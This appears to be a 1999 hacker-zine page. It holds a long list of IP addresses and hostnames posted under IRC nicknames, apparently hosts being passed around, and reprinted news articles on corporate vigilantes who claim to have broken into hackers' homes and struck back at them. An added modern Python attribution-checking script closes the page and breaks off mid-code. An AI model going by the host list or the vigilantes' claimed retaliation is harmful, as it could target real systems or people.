198.247.215.1 [latency: 09/30/99 15:02:12 PDT]
mh.gymnaziumtu.cz [latency: 09/30/99 13:21:22 PDT by sandoc]
210.114.231.130 [latency: 09/30/99 13:18:59 PDT by sandoc]
210.56.18.225 [latency: 09/30/99 13:16:33 PDT by sandoc]
pen22755-1.gw.connect.com.au [latency: 09/30/99 13:14:19 PDT by sandoc]
cix.abaco.edu.pe [latency: 09/30/99 13:09:37 PDT by sandoc]
note.ark.ne.jp [latency: 09/30/99 13:07:40 PDT by sandoc]
208.5.13.15 [latency: 09/30/99 13:05:23 PDT by sandoc]
203.135.2.188 [latency: 09/30/99 13:01:51 PDT by sandoc]
193.227.185.190 [latency: 09/30/99 12:59:35 PDT by sandoc]
194.204.205.127 [latency: 09/30/99 12:58:22 PDT by sandoc]
193.227.181.144 [latency: 09/30/99 12:55:20 PDT by sandoc]
200.230.120.133 [latency: 09/30/99 12:53:51 PDT by sandoc]
194.75.255.156 [latency: 09/29/99 10:19:20 PDT by sandoc]
infou429.jet.es [latency: 09/29/99 10:18:13 PDT by sandoc]
212.252.66.206 [latency: 09/29/99 10:16:50 PDT by sandoc]
203.197.208.36 [latency: 09/29/99 10:15:07 PDT by sandoc]
216.226.197.179 [latency: 09/29/99 10:05:53 PDT by sandoc]
chaus.ozemail.com.au [latency: 09/29/99 10:04:12 PDT by sandoc]
maodcfm.egat.or.th [latency: 09/29/99 10:01:24 PDT by sandoc]
200.46.20.185 [latency: 09/29/99 09:56:02 PDT by sandoc]
195.249.229.4 [latency: 09/29/99 09:53:20 PDT by sandoc]
sscoin.com [latency: 09/29/99 09:47:10 PDT by sandoc]
proxy.cyberg.it [latency: 09/29/99 08:46:47 PDT by aaa]
195.182.171.121 [latency: 09/29/99 05:27:51 PDT by Bi0Sk|lleR]
whois.internic.net [latency: 09/28/99 10:57:58 PDT]
200.42.146.150 [latency: 09/28/99 10:03:10 PDT by sandoc]
203.197.9.162 [latency: 09/28/99 09:56:20 PDT by sandoc]
mail.tbccorp.com [latency: 09/28/99 09:54:59 PDT by sandoc]
MF2-1-036.mgfairfax.rr.com [latency: 09/28/99 09:48:25 PDT by sandoc]
195.146.98.226 [latency: 09/28/99 09:34:37 PDT by sandoc]
202.186.134.6 [latency: 09/28/99 04:30:26 PDT by B Wang]
207.139.234.203 [latency: 09/27/99 20:54:19 PDT by monster]
radna-gw.supermedia.pl [latency: 09/27/99 20:30:25 PDT]
DONT.WRITE. BULLSHIT.HERE [latency: 09/27/99 19:22:09 PDT by abed]
209.21.14.65 [latency: 09/27/99 13:40:26 PDT by sandoc]
192.117.8.253 [latency: 09/27/99 13:38:27 PDT by sandoc]
192.106.117.25 [latency: 09/27/99 13:35:07 PDT by sandoc]
212.68.152.3 [latency: 09/27/99 13:33:46 PDT by sandoc]
194.73.125.69 [latency: 09/27/99 13:29:42 PDT by sandoc]
sie-home-1-7.urbanet.ch [latency: 09/27/99 13:09:32 PDT by sandoc]
neptune.sunlink.net [latency: 09/27/99 08:51:15 PDT by Juxtaposition]
24.1.3.125 [latency: 09/27/99 08:32:57 PDT by Juxtaposition]
24.1.4.116 [latency: 09/27/99 08:31:56 PDT by Juxtaposition]
sherlock.ibi.co.za [latency: 09/26/99 15:44:34 PDT by Juxtaposition]
207.50.228.163 [latency: 09/26/99 10:19:37 PDT by sandoc]
193.15.241.21 [latency: 09/26/99 10:10:53 PDT by sandoc]
194.25.204.29 [latency: 09/26/99 10:09:24 PDT by sandoc]
207.229.47.11 [latency: 09/26/99 10:08:00 PDT by sandoc]
205.237.210.214 [latency: 09/26/99 10:06:38 PDT by sandoc]
c30-169.the-bridge.net [latency: 09/26/99 09:59:18 PDT by sandoc]
38.30.155.88 [latency: 09/25/99 21:17:05 PDT by Jame]
152.169.201.156 [latency: 09/25/99 20:23:48 PDT]
24.112.84.102 [latency: 09/25/99 13:11:04 PDT by BLaZeR u Newbie!]
24.112.84.94 [latency: 09/25/99 13:10:23 PDT by BLaZeR u NeWb! H]
mail.trikotazas.lt [latency: 09/25/99 12:08:31 PDT by babysuk]
209.183.86.96 [latency: 09/25/99 11:11:55 PDT by Shogo]
206.103.12.131 [latency: 09/25/99 10:41:41 PDT by sandoc]
proxy01.faboro.ch [latency: 09/25/99 10:36:49 PDT by sandoc]
pc1.expansion.com.mx [latency: 09/25/99 10:36:06 PDT by sandoc]
207.3.122.85 [latency: 09/25/99 10:33:38 PDT by sandoc]
radna-gw.supermedia.pl [latency: 09/25/99 10:29:52 PDT by sandoc]
202.135.160.10 [latency: 09/25/99 10:28:57 PDT by sandoc]
gateway.eltjanst.se [latency: 09/25/99 10:26:13 PDT by sandoc]
ns.holonic.co.jp [latency: 09/25/99 10:24:57 PDT by sandoc]
203.101.1.22 [latency: 09/25/99 10:23:18 PDT by sandoc]
163.121.200.72 [latency: 09/25/99 10:13:01 PDT]
195.216.48.13 [latency: 09/25/99 06:42:29 PDT]
24.112.84.93 [latency: 09/24/99 23:50:43 PDT by U R DEAD ZASZ U FAG]
24.112.97.9 [latency: 09/24/99 23:39:29 PDT by BLaZeR]
210.237.183.226 [latency: 09/24/99 20:55:02 PDT by ~TG|{~ZaSz]
200.210.15.188 [latency: 09/24/99 20:54:40 PDT by ZaSz]
24.226.156.214 [latency: 09/24/99 20:54:20 PDT by ZaSz]
202.21.8.31 [latency: 09/24/99 20:54:07 PDT by ZaSz]
202.21.8.21 [latency: 09/24/99 20:53:54 PDT by ~TG|{~ZaSz]
200.210.15.166 [latency: 09/24/99 20:53:34 PDT by ZaSz]
139.142.170.233 [latency: 09/24/99 20:53:22 PDT by ZaSz]
24.30.53.10 [latency: 09/24/99 20:53:10 PDT by ZaSz]
24.30.109.224 [latency: 09/24/99 20:52:44 PDT by ZaSz]
24.0.233.86 [latency: 09/24/99 20:52:34 PDT by ZaSz]
200.255.107.140 [latency: 09/24/99 20:52:11 PDT by ZaSz]
200.36.8.103 [latency: 09/24/99 20:51:56 PDT by ZaSz]
200.38.211.242 [latency: 09/24/99 20:51:42 PDT by ZaSz]
200.38.211.253 [latency: 09/24/99 20:51:24 PDT by ZaSz]
200.38.211.246 [latency: 09/24/99 20:51:10 PDT by ZaSz]
210.169.139.161 [latency: 09/24/99 20:50:59 PDT by ZaSz]
210.226.69.210 [latency: 09/24/99 20:50:48 PDT by ZaSz]
209.251.71.115 [latency: 09/24/99 20:50:30 PDT by ZaSz]
24.0.79.151 [latency: 09/24/99 20:50:18 PDT by ZaSz]
24.0.79.40 [latency: 09/24/99 20:50:05 PDT by ZaSz]
24.4.27.2 [latency: 09/24/99 20:49:49 PDT by ZaSz]
207.102.5.161 [latency: 09/24/99 20:49:36 PDT by ZaSz]
207.102.5.162 [latency: 09/24/99 20:49:21 PDT by ZaSz]
210.164.86.34 [latency: 09/24/99 20:49:06 PDT by ZaSz]
195.67.1.34 [latency: 09/24/99 20:48:12 PDT by ZaSz]
195.216.48.36 [latency: 09/24/99 20:47:54 PDT by ZaSz]
195.216.48.30 [latency: 09/24/99 20:47:41 PDT by ZaSz]
195.216.48.13 [latency: 09/24/99 20:47:24 PDT by ZaSz]
210.226.82.162 [latency: 09/24/99 20:47:06 PDT by ZaSz]
200.13.19.218 [latency: 09/24/99 20:46:51 PDT by ZaSz]
200.13.19.213 [latency: 09/24/99 20:46:36 PDT by ZaSz]
200.13.19.181 [latency: 09/24/99 20:46:21 PDT by ZaSz]
200.13.19.141 [latency: 09/24/99 20:46:08 PDT by ZaSz]
200.13.19.76 [latency: 09/24/99 20:45:55 PDT by ZaSz]
200.13.19.33 [latency: 09/24/99 20:45:43 PDT by ~TG|{~ZaSz]
195.182.171.121 [latency: 09/24/99 20:45:21 PDT by ZaSz]
24.112.39.232 [latency: 09/24/99 20:43:14 PDT by ZaSz]
24.2.29.54 [latency: 09/24/99 20:41:41 PDT by ZaSz]
24.112.75.210 [latency: 09/24/99 20:41:30 PDT by ZaSz]
24.112.7.143 [latency: 09/24/99 20:41:18 PDT by ZaSz]
24.93.15.248 [latency: 09/24/99 20:41:05 PDT by ZaSz]
24.64.210.14 [latency: 09/24/99 20:40:52 PDT by ZaSz]
24.112.167.186 [latency: 09/24/99 20:40:36 PDT by ZaSz]
203.102.199.109 [latency: 09/24/99 20:40:13 PDT by ZaSz]
210.161.200.82 [latency: 09/24/99 20:39:55 PDT by ZaSz]
207.102.5.162 [latency: 09/24/99 20:39:42 PDT by ZaSz]
207.102.5.161 [latency: 09/24/99 20:39:26 PDT by ZaSz]
203.102.199.209 [latency: 09/24/99 20:39:15 PDT by ZaSz]
203.102.199.186 [latency: 09/24/99 20:39:02 PDT by ZaSz]
203.102.199.72 [latency: 09/24/99 20:38:51 PDT by ZaSz]
203.102.199.21 [latency: 09/24/99 20:38:40 PDT by ZaSz]
203.102.199.22 [latency: 09/24/99 20:38:16 PDT by ZaSz]
203.102.199.11 [latency: 09/24/99 20:38:03 PDT by ZaSz]
209.165.135.138 [latency: 09/24/99 20:37:53 PDT by ZaSz]
216.72.47.33 [latency: 09/24/99 20:37:36 PDT by ZaSz]
216.72.47.18 [latency: 09/24/99 20:37:23 PDT by ZaSz]
216.72.47.16 [latency: 09/24/99 20:37:08 PDT by ZaSz]
216.72.47.12 [latency: 09/24/99 20:36:51 PDT by ~TG|{~ZaSz = ZaSz]
216.72.47.8 [latency: 09/24/99 20:36:14 PDT by ZaSz]
216.72.47.4 [latency: 09/24/99 20:36:01 PDT by ZaSz]
209.4.68.50 [latency: 09/24/99 20:35:44 PDT by ZaSz]
200.38.211.253 [latency: 09/24/99 20:35:32 PDT by ZaSz]
200.38.211.251 [latency: 09/24/99 20:35:08 PDT by ZaSz]
200.38.211.240 [latency: 09/24/99 20:34:49 PDT by ZaSz]
200.38.211.226 [latency: 09/24/99 20:34:37 PDT by ZaSz]
200.38.211.239 [latency: 09/24/99 20:34:18 PDT by ZaSz]
209.144.19.86 [latency: 09/24/99 20:34:05 PDT by ZaSz]
206.141.48.2 [latency: 09/24/99 20:33:53 PDT by ZaSz]
24.93.51.131 [latency: 09/24/99 20:33:33 PDT by ~TG|{~ZaSz]
irc.dm.net.lb [latency: 09/24/99 14:22:40 PDT by Devil]
DONT.WRITE. BULLSHIT.HERE [latency: 09/24/99 14:18:49 PDT by Devil]
156-21.dr.cgocable.ca [latency: 09/24/99 14:14:50 PDT by Devil]
209.198.248.139 [latency: 09/24/99 14:12:11 PDT by Devil]
hs.state.az.us [latency: 09/24/99 14:11:23 PDT by Devil]
207.225.232.5 [latency: 09/24/99 13:18:41 PDT by sandoc]
212.252.147.144 [latency: 09/24/99 13:14:59 PDT by sandoc]
195.87.12.110 [latency: 09/24/99 13:04:21 PDT by sandoc]
195.14.129.129 [latency: 09/24/99 13:01:58 PDT by sandoc]
193.192.109.139 [latency: 09/24/99 13:00:46 PDT by sandoc]
194.204.240.157 [latency: 09/24/99 12:58:33 PDT by sandoc]
212.252.15.80 [latency: 09/24/99 12:54:30 PDT by sandoc]
212.252.149.99 [latency: 09/24/99 12:52:36 PDT by sandoc]
ar5-120i.dial-up.arnes.si [latency: 09/24/99 12:50:01 PDT by sandoc]
cuscon1658.tstt.net.tt [latency: 09/24/99 12:48:49 PDT by sandoc]
host029210.ciudad.com.ar [latency: 09/24/99 12:46:36 PDT by sandoc]
202.213.244.234 [latency: 09/24/99 12:40:07 PDT by sandoc]
asy26.as01.sol1.superonline.com [latency: 09/24/99 12:34:37 PDT by sandoc]
207.158.108.99 [latency: 09/24/99 12:32:59 PDT by sandoc]
212.33.193.146 [latency: 09/24/99 12:30:45 PDT by sandoc]
cableweb.w3.to [latency: 09/23/99 20:03:23 PDT]
ppp-15-78.cyberia.net.lb [latency: 09/23/99 13:43:06 PDT by sandoc]
flammen.aof.no [latency: 09/23/99 13:41:38 PDT by sandoc]
eta.riosoft.softex.br [latency: 09/23/99 13:40:05 PDT by sandoc]
Pelican.CITY.UniSA.edu.au [latency: 09/23/99 13:37:07 PDT by sandoc]
server1.wingsink.com [latency: 09/23/99 13:34:13 PDT by sandoc]
mail.jgboswell.com [latency: 09/23/99 13:32:42 PDT by sandoc]
210.136.60.2 [latency: 09/23/99 13:31:36 PDT by sandoc]
210.145.140.245 [latency: 09/23/99 13:30:02 PDT by sandoc]
dc.com.pl [latency: 09/23/99 13:27:43 PDT by sandoc]
Tuva-Tcms17.krs.ru [latency: 09/23/99 13:26:13 PDT by sandoc]
impexcabmet.LL.sl.ru [latency: 09/23/99 13:24:09 PDT by sandoc]
proxy.cyberg.it [latency: 09/23/99 13:15:29 PDT by sandoc]
194.79.101.94 [latency: 09/23/99 13:13:27 PDT by sandoc]
ns.bibliodata.net [latency: 09/23/99 13:11:38 PDT by sandoc]
194.213.239.19 [latency: 09/23/99 13:06:55 PDT by sandoc]
server.tf.ITB.ac.id [latency: 09/23/99 13:04:38 PDT by sandoc]
212.133.139.3 [latency: 09/23/99 12:56:08 PDT by sandoc]
207.3.122.85 [latency: 09/23/99 12:54:12 PDT by sandoc]
210.237.183.226 [latency: 09/23/99 12:52:56 PDT by sandoc]
dciserver.twfrierson.com [latency: 09/23/99 12:51:52 PDT by sandoc]
as3-54.gto.net.om [latency: 09/23/99 12:48:46 PDT by sandoc]
tirith.mngt.waikato.ac.nz [latency: 09/23/99 12:46:50 PDT by sandoc]
ABD708E3.ipt.aol.com [latency: 09/23/99 12:45:24 PDT by sandoc]
sil.am [latency: 09/23/99 11:40:39 PDT by [0uTw0rLd]]
hs.state.az.us [latency: 09/22/99 20:34:48 PDT]
141.216.41.247 [latency: 09/22/99 11:38:31 PDT]
195.182.171.121 [latency: 09/22/99 07:17:12 PDT by N1C]
chat.groovy.gr [latency: 09/21/99 13:46:58 PDT by aqile]
24.137.18.44 [latency: 09/21/99 13:44:00 PDT]
195.122.112.11 [latency: 09/21/99 12:39:54 PDT by bebhlos]
cableweb.w3.to [latency: 09/21/99 03:59:56 PDT]
208.184.64.1 [latency: 09/20/99 16:14:28 PDT]
202.21.8.21 [latency: 09/20/99 10:43:21 PDT]
yes...i do mind [latency: 09/20/99 10:17:07 PDT by b33sh]
202.21.8.21 [latency: 09/20/99 09:13:42 PDT]
do u mind...if i fuck u? [latency: 09/20/99 06:42:48 PDT]
202.21.8.171 [latency: 09/19/99 22:12:08 PDT by 0ct4g0n0]
200.210.15.178 [latency: 09/19/99 04:32:31 PDT by SeA^g|R|_]
proxy.amtvl.com [latency: 09/19/99 03:15:31 PDT]
ns.devp.org [latency: 09/19/99 03:12:16 PDT]
Hacker.Com [latency: 09/19/99 03:11:08 PDT]
205.230.60.56 [latency: 09/18/99 19:32:00 PDT by #OP - DALnet - DIE]
T.O.O.H_Inc. [latency: 09/18/99 16:30:29 PDT]
203.243.123.14 [latency: 09/18/99 14:48:57 PDT by SeA^g|R|_]
207.242.80.66 [latency: 09/18/99 08:06:36 PDT by #SocketS/MSNr3db|00d]
207.236.55.231 [latency: 09/18/99 07:59:41 PDT by r3db|00d]
206.132.179.167 [latency: 09/18/99 07:20:02 PDT by SeA^g|R|_]
thunder.jpl.nasa.gov [latency: 09/18/99 02:59:45 PDT by ThUnDeR]
24.226.156.21 [latency: 09/17/99 06:54:23 PDT by kamel]
Telezimex.ro [latency: 09/16/99 23:46:52 PDT by Kamel]
rs.internic.net [latency: 09/16/99 14:13:22 PDT by Kick DALnet Ass!!!]
202.21.8.21 [latency: 09/15/99 23:35:14 PDT by turbobeaver]
is.theshit.and.your.a.lammah.com [latency: 09/15/99 07:48:20 PDT by dEm0nL|T|0niSt]
DAL.net.is.owned. [latency: 09/15/99 07:07:05 PDT by Anakin]
ts1-32.gcc.cyberhighway.net [latency: 09/14/99 10:33:37 PDT by pit]
dns.yoshinomasa.co.jp [latency: 09/14/99 10:30:04 PDT by Wolfen]
P62.ASC-MB05.QZN.SKYINET.NET [latency: 09/14/99 10:28:36 PDT by kusa]
P59.ASC-MB05.QZN.SKYINET.NET [latency: 09/14/99 00:01:34 PDT]
ts1-32.gcc.cyberhighway.net [latency: 09/13/99 23:59:02 PDT]
200.210.15.178 [latency: 09/13/99 23:58:03 PDT]
@HWA
19.0 Internet Vigilantism A story so fantastic it just might be true...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by cult_hero
Lou Cipher discusses his experiences of confiscating
computer equipment and B&E all without a warrant. This
information security 'professional' claims to have tracked
cyber intruders to their homes and then paid them an
unannounced visit complete with baseball bat. Claiming
that 'self defense' is the only option available to him and
the companies he works for, Lou Cipher brazenly takes
the law into his own hands with little regard for the
consequences.
HNN has serious doubts about the validity of these
claims. We would like to hear from anyone who has
been the target for any such illegal home invasion.
MSNBC - Bob Sullivan on September 28, 1999
http://www.msnbc.com/news/311611.asp
CNN - Original Story by Winn Schwartau on January 12,1999
http://cnn.com/TECH/computing/9901/12/cybervigilantes.idg/index.html
MSNBC;
Vigilante justice in cyberspace
When companies want swift action against hackers, they don't
always call the law
By Bob Sullivan
MSNBC
Sept. 27 - You're a bank, and you think someone is trying to hack into your
computer system. Where do you turn? Law enforcement offers little help:
agencies are overworked and understaffed, and you risk public embarrassment
if word gets out. Apparently, there's another option. You might decide to take
the law into your own hands. Which means you might call a man known as Lou
Cipher. Lou says he's spent the last 10 years working for Fortune 500 companies,
turning the tables on computer intruders, performing what some have called vigilante
justice in cyberspace.
CIPHER, A PSEUDONYM of his own choosing, says
he retired from a 15-year career as a computer consultant in 1990. By then, he had
already started his life as a hacker for hire.
In the past 10 years, he says he's been hired over 50 times by big U.S. firms, mostly
financial institutions, looking to get hackers off their back. He says fees now start
at $100,000 for new clients, with no promises of success.
He and his associates often take on their tasks by bridging from the virtual world to
the physical. That means breaking into the same computers a hacker has hijacked,
chasing the trail through cyberspace, obtaining a real-world address and paying a
real-life visit. Cipher says he's even broken into homes and stolen hackers' computers
to teach them a lesson. He gives the machines back after recovering any stolen
information. "I am engaged in the protection and regaining of stolen assets because of the
inability of government to provide adequate protection and prosecution," Cipher says. And
that includes, he admits, breaking laws himself. His defense: "It's self-defense. You can
call the FBI right now and say a person just got off with a database of customers. What
is the FBI going to do?"
The increase in technology crime has given fits to law enforcement agencies who find they
don't have the necessary skills to keep up with an army of new criminals, emboldened by the
anonymity the Net provides. Even when federal agents act, justice can be slow. It took almost
six months for the recent nationwide FBI hacker crackdown to produce an arrest.
So Cipher, and some say other such corporate vigilantes, take the law into their own hands.
Still, to call breaking into someone else's home an act of corporate self-defense would likely
be considered a stretch in court.
"I don't see that argument holding water," said cyberlaw expert Dorsey Morrow. "It would be a
dangerous thing for a corporation to do. The potential liability is incredible." Particularly
if vigilantes hit the wrong target. That's the concern of computer consultant Brian Martin,
who maintains the popular hacker information site attrition.org.
"So Lou and his gang roll up on this house and know the intruder dialed from there. They bust
in and terrorize an elderly couple. Oops!" Martin said. "How could they have been so wrong? Because
the hacker used a laptop from the phone box outside their house. That scenario scares me."
Cipher was first identified in public when information warfare expert Winn Schwartau used his
name in a column for Network World in January. Claims of baseball bat-wielding vigilantes stirred
skepticism in the underworld, and neither Martin nor Space Rogue, who maintains the Hacker News
Network Web site, say they've ever heard of a hacker being visited by any private security agent.
"Considering the size of this community, if he has visited more than 10 people I am sure word would
have leaked," Rogue said. But he added, "There have been rumors floating around for a few years of
corporations with their own internal security taking matters into their own hands."
That has law enforcement agencies anxious enough to discuss the matter publicly. Jim Christy,
special agent for the Department of Defense, debated Schwartau on the topic at the Infowarcon
conference earlier this month. "I have no problem with identifying a bad guy and warning them,"
said Christy, who for 11 years was chief of computer crime for the Air Force Office of Special
Investigations. "That's a legitimate self-defense option for a victim. But it crosses the line
when you violate the rights of others. ... It crosses the line when you break the law."
He said the key to making law enforcement agencies more effective is for more victims of computer
crime to come forward. Without a backlog of cases, agents can't demand additional resources.
Companies that hire vigilantes, or who simply brush computer crime under the rug out of
fear of embarrassment, only make the situation worse, he said.
But that won't help victims today, Schwartau said, and they need somewhere to turn. "The legal
community says it's blatantly illegal," Schwartau said. Schwartau, who once shared ownership of a
Web site venture with Cipher, says the legal community is being closed-minded on the topic. "Is
disarming an adversary illegal? ... You're allowed to do repossession, which is stealing your own
possessions back."
When MSNBC visited Cipher at his daytime consulting job, where he is a security adviser for a
large U.S. brokerage company, Cipher said he painstakingly verifies his targets and admits sometimes
he doesn't catch them. Most of the examples he offered involved pre-emptive strikes against
hackers probing financial networks, the cyber equivalent of casing a bank before a robbery.
Such pre-emptive strikes have taken him as far as Eastern Europe, and even India, he said. In one
case, he said college-aged hackers in the Czech Republic were worming their way toward a bank's credit
card database. Another incident involved hackers in India trying to fake an electronic funds transfer.
But sometimes, he said, he does his work entirely over the Internet. Last month he says his agents
broke into the computer of a man who held a vast database of stolen credit cards. They scrambled the
card numbers to render them useless.
Many more of his stories are less dramatic, involving a polite curbside or coffeehouse conversation
with a hacker. Often, that's enough, he says. "They are very surprised when we come to visit, when
we bridge to the physical world," he said.
CNN;
Cyber-vigilantes hunt down
hackers
January 12, 1999
Web posted at: 12:19 a.m. EDT (1219 GMT)
by Winn Schwartau
From...
(IDG) -- In September 1998, the Electronic Disturbance Theater, a group of activists that
practices politically driven cyber civil-disobedience, launched an attack aimed
at disabling a Pentagon Web site by flooding it with requests.
The Pentagon responded by redirecting the requests to a Java applet programmed to
issue a counteroffensive. The applet flooded the browsers used to launch the attack with
graphics and messages, causing them to crash.
The incident raises issues all user organizations will soon have to grapple with,
if they haven't already. When you detect a break-in, should you launch a
counterattack in order to protect your network? Is law enforcement capable
of stopping cybercrime and can it be trusted to keep investigations quiet? If
not, do corporations have a right to defend themselves?
Some emboldened user organizations are answering "yes." They are striking
back against hackers, sometimes with military efficiency and intensity, in an
effort to protect their self-interests. In the process, they are fueling a debate
over what is legal and ethical in terms of corporate vigilantism.
One end of the opinion spectrum says law enforcement agencies
are generally not up to the task, so corporations have a fiduciary
responsibility to protect their interests. The only question for
these companies is how far they are willing to go. Will they break
laws, and if so, which ones? The opposite view is corporate vigilantism is wrong:
Taking the law into one's own hands only makes things worse.
The First Vigilante Corp.
Lou Cipher (a pseudonym of his choice) is a senior security manager at one of
the country's largest financial institutions. "There's not a chance in hell of us
going to law enforcement with a hacker incident," he says. "They can't be
trusted to do anything about it, so it's up to us to protect ourselves."
Cipher's firm has taken self-protection to the extreme. "We have the right to
self-help - and yes, it's vigilantism," he says. "We are drawing a line in the
sand, and if any of these dweebs cross it, we are going to protect ourselves."
Cipher says his group has management approval to do "whatever it takes" to
protect his firm's corporate network and its assets.
"We have actually gotten on a plane and visited the physical location where
the attacks began. We've broken in, stolen the computers and left a note: 'See
how it feels?' " On one occasion, he says: "We had to resort to baseball bats.
That's what these punks will understand. Then word gets around, and we're
left alone. That's all we want, to be left alone."
A senior vice president of security at a major global financial firm speaks of
the matter in military terms. He equates a hacker intrusion to a "first strike,"
and says defense is an appropriate response. "If you use measures to restore
your services, that's defense, not offense," he says. When asked how far his
company goes, he concedes only, "I am willing to defend myself."
In interviews with dozens of companies, a surprising number are seriously
considering implementing "strike-back" capabilities. However, when asked,
most companies would not admit they have already taken such steps.
Bruce Lobree, an internal security consultant at a major financial institution, is cautious
about admitting his firm uses vigilante activities and strike-back techniques. He says with
a smile, "I can't answer yes or no. That's proprietary. Besides, legally we can't. But I can
tell you that everything that occurs at our network perimeter and inside our networks is
recorded."
A recent study, "Corporate America's Competitive Edge," conducted by Warroom Research, a
competitive intelligence firm in Annapolis, Md., shows that 32% of the 320 surveyed Fortune
500 companies have installed counteroffensive software. Warroom President Mark Gembecki
notes that not every company will send out thugs to enforce their firewall policies.
Cyber-response is OK, he says, but Cipher's physical retaliation is "a clear and overt
violation of civil rights."
Such extreme counteroffensive methods raise the hackles of even the staunchest corporate
information warrior. Lloyd Reese, program manager of information assurance for Troy Systems,
a technical support company in Fairfax, Va., has a criminal justice background and says
physical response is illegal and "doomed to failure." Such responses will only invite further
attacks - perhaps even more intense, he says.
"Companies need to follow the appropriate legal process. We already have
chaos on the Internet, why should we make it worse?"
Joseph Broghamer, information assurance lead for the U.S. Navy's Office of
the Chief Information Officer, goes further, saying even the Pentagon
shouldn't have done what it did. "Offensive information warfare is not a good
thing . . . period. You want to block, not punish," he says. "There is no
technical reason to react offensively to a hacker attack." His opinion is shared
by precious few.
As part of its information security practice, Ernst & Young has been asked
about strike-back capabilities and how hostile perimeters might be used for
defense.
Dan Woolley, national leader of market development for the firm, says he
knows of "companies in finance, insurance and manufacturing that are
developing and deploying the capability to aggressively defend their networks."
He is quick to point out, however, "We don't do it for ourselves even though
we are attacked regularly."
The questions security software vendors and consultancies like Ernst &
Young are now grappling with are wrenching: Should they develop offensive
software, offer it to their clients, deploy it and support it? And if so, how open
should they be about it?
How they do it
It's easy to understand why companies are interested in the idea of corporate
vigilantism. Even the best layers of defense - firewalls, passwords and access
control lists - can't work alone for many reasons. Among them:
Network topology, users and software are constantly changing. There
is no way to keep up.
New vulnerabilities are found - and exploited - daily.
A small number of individuals with little technical skill can launch
massive online attacks.
Once an attack is detected, corporate vigilantes have various methods
of evening the score.
The Navy's Broghamer argues that sometimes the best response to an
attack is to shut down the network connection altogether, although he
acknowledges the Navy is not as sensitive to uptime and customer
perception as the private sector.
Another approach is to send a strongly worded message to the source
IP address or to an ISP in the path. The source address comes from your own
logs; traceroute can then map the route toward it. But you have to get the
assistance of ISPs down the line to trace additional hops on the Internet,
because each hop has to be covered in order to find the real source. That's all
legal, but you may need to pressure the ISP into working with you
quickly to identify the next hop in the chain. Once you collect this data,
it can be handed over to law enforcement officials - who may or may
not react.
In 1994, Secure Computing, a security vendor in Roseville, Minn., introduced
Sidewinder, a novel firewall with strike-back capabilities. If it senses an
attack, it launches a daemon that will trigger the offensive techniques of your
choice. Other companies indicate they will soon be offering a range of
strike-back products.
A company crosses the line when it responds by unleashing a
denial-of-service attack against an intruder, as the Pentagon did. This can be
done via massive e-mail spamming, the Ping of Death and hostile Java applets.
No matter what offensive mechanism you choose, the trick is to identify the
culprit before returning fire. Should you fail to recognize that the attacker
spoofed the identity of another company, you may find yourself attacking J.C.
Penney, NBC or General Motors. Innocent companies would not take kindly
to that sort of activity - no matter the reason - and ISPs don't appreciate being
the vehicle for Internet-based attacks.
Indeed, one of the big dangers with corporate vigilantism is how easy it is to
overreact to an apparent attack. In spring 1997, one of the Big Six accounting
firms used scanning tools from Internet Security Systems (ISS) to assess the
security of a major ISP that controlled a huge amount of Internet traffic.
When a network administrator on duty at the ISP noticed a thousand
simultaneous connections to his firewall, he reacted quickly and shut down
several routers. "His manual reaction took down 75% of the Internet," says
Tom Noonan, president of ISS. "Anyone using Sprint at that time was in a
world of hurt."
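The two cautions above, returning fire at a source address that may be forged and overreacting to a burst of connections, come down to one check: before responding to an apparent attack, find out what the logs actually prove about its origin. The script below is an added example written for this reprint, not code from the article or from any product it mentions. It assumes a hypothetical one-line-per-packet firewall log format and uses constructed sample lines with RFC 5737 documentation addresses. It separates sources that completed a TCP three-way handshake (the address at least received our SYN-ACK, so it is the real last hop) from sources seen only in bare SYNs (trivially forgeable), then plans a response that blocks, logs or reports but never targets anyone.

```python
"""Attribution check before any response to an apparent network attack.

Added example. The log format and the sample lines below are constructed
for illustration; they do not come from any real firewall product.
"""
import re
from collections import defaultdict

# Hypothetical format: "<timestamp> <src>:<sport> -> <dst>:<dport> flags=<TCP flags>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>[\d.]+):(?P<sport>\d+)\s*->\s*"
    r"(?P<dst>[\d.]+):(?P<dport>\d+)\s+flags=(?P<flags>[A-Z]+)$"
)

# Constructed sample: one source completes a handshake and sends data,
# one source sends a burst of SYNs from consecutive ports and never
# answers our SYN-ACK (the signature of a forged source), one stray SYN.
SAMPLE_LOG = """\
1999-09-28T03:14:01 203.0.113.7:40001 -> 192.0.2.10:80 flags=S
1999-09-28T03:14:01 203.0.113.7:40001 -> 192.0.2.10:80 flags=A
1999-09-28T03:14:02 203.0.113.7:40001 -> 192.0.2.10:80 flags=PA
1999-09-28T03:14:05 198.51.100.3:1025 -> 192.0.2.10:80 flags=S
1999-09-28T03:14:05 198.51.100.3:1026 -> 192.0.2.10:80 flags=S
1999-09-28T03:14:05 198.51.100.3:1027 -> 192.0.2.10:80 flags=S
1999-09-28T03:14:05 198.51.100.3:1028 -> 192.0.2.10:80 flags=S
1999-09-28T03:14:06 198.51.100.44:2000 -> 192.0.2.10:80 flags=S
"""


def parse_log(text):
    """Return one dict per well-formed inbound packet line; skip anything else."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def classify_sources(events):
    """Split sources into handshake-completed and SYN-only, with per-source SYN counts.

    A flow counts as completed only if an inbound ACK (without SYN) follows an
    inbound SYN on the same 4-tuple: the peer must have seen our SYN-ACK, so the
    address is at least the real last hop. A bare SYN proves nothing about the
    address in it.
    """
    syn_flows = set()
    completed = set()
    syn_count = defaultdict(int)
    for e in events:
        flow = (e["src"], e["sport"], e["dst"], e["dport"])
        if "S" in e["flags"]:
            syn_flows.add(flow)
            syn_count[e["src"]] += 1
        elif "A" in e["flags"] and flow in syn_flows:
            completed.add(e["src"])
    syn_only = set(syn_count) - completed
    return {"completed": completed, "syn_only": syn_only, "syn_count": dict(syn_count)}


def plan_response(classes, flood_threshold=3):
    """Map each source to a defensive action; nothing here sends traffic back."""
    plan = []
    for ip in sorted(classes["completed"]):
        # Attributable to the last hop only: preserve evidence, go through the ISP.
        plan.append((ip, "preserve logs; abuse report to the address's ISP"))
    for ip in sorted(classes["syn_only"]):
        if classes["syn_count"][ip] >= flood_threshold:
            # Unverified address under flood: throttle at the perimeter, never strike back.
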